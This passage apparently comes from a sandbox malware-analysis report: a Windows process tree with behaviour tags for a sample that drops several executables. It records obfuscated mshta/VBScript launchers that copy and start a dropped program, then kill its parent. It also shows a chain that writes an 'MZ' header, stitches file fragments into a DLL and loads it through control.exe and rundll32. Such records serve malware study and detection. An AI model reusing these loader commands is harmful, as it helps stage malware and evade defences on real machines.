C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS803DB626\Sun158d8ef840.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS803DB626\Sun158d8ef840.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )6⤵PID:1400
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS803DB626\Sun158d8ef840.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS803DB626\Sun158d8ef840.exe") do taskkill /F -Im "%~NxU"7⤵
- Loads dropped DLL
PID:1324 -
C:\Users\Admin\AppData\Local\Temp\09xU.exE09xU.EXE -pPtzyIkqLZoCarb5ew8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1448 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )9⤵PID:1488
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"10⤵PID:2344
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )9⤵PID:2528
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I10⤵PID:2788
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "11⤵PID:2848
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"11⤵PID:2872
-
-
C:\Windows\SysWOW64\control.execontrol .\R6f7sE.I11⤵PID:2904
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I12⤵
- Loads dropped DLL
PID:2976 -
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I13⤵PID:768
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I14⤵
- Loads dropped DLL
PID:800
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -Im "Sun158d8ef840.exe"8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1884
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun152e52d07b74d9b5.exe4⤵
- Loads dropped DLL
PID:688 -
C:\Users\Admin\AppData\Local\Temp\7zS803DB626\Sun152e52d07b74d9b5.exeSun152e52d07b74d9b5.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2644 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2644 -s 17326⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1760
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1507db358fce61c0b.exe4⤵PID:1656
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun159ff1acacf.exe4⤵
- Loads dropped DLL
PID:1248
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS803DB626\Sun159ff1acacf.exeSun159ff1acacf.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1672 -
C:\Users\Admin\AppData\Local\Temp\7zS803DB626\Sun159ff1acacf.exeC:\Users\Admin\AppData\Local\Temp\7zS803DB626\Sun159ff1acacf.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2032
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {38DFB59E-E3FC-4AC3-BE96-DB672BC0E630} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2004
-
C:\Windows\system32\taskeng.exetaskeng.exe {9D82E619-ED9E-49A3-BA29-E8E82C0C9CAD} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:1112
-
C:\Program Files\Mozilla Firefox\default-browser-agent.exe"C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task2⤵PID:1812
-